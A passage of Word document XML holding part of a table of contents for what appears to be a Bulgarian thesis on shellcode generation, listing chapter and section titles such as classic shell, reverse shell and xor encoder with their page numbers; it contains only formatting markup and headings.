              <w:instrText xml:space="preserve"> PAGEREF _Toc3540803 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>56</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540804" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>3.5.4.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Контейнери (класове) за модули</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540804 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>58</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540805" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4. Четвърта глава Анализ на генерирания shellcode</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540805 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>61</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540806" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Класически shell</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540806 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>61</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540807" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Reverse shell</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540807 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>63</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540808" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>xor encoder</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540808 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>67</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540809" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.4.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Общи разлики в асемблера</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540809 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>68</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540810" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>4.4.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Оптимизации</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540810 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>68</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540811" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>4.4.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Информация за дебъгване</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540811 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>69</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540812" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.5.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Обобщение на резултатите</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540812 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>69</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540813" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Заключение</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540813 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>71</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540814" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Библиографи</w:t>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="bg-BG"/>
              </w:rPr>
              <w:t>я</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540814 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>72</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540815" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Списък на използваните съкращения</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540815 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>75</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540816" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Приложение 1 - ръководство на потребителя</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540816 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>76</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540817" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Приложение 2 - Справочник на използвани инструкции</w:t>
            </w:r>
            <w:r>
              <w:rPr>
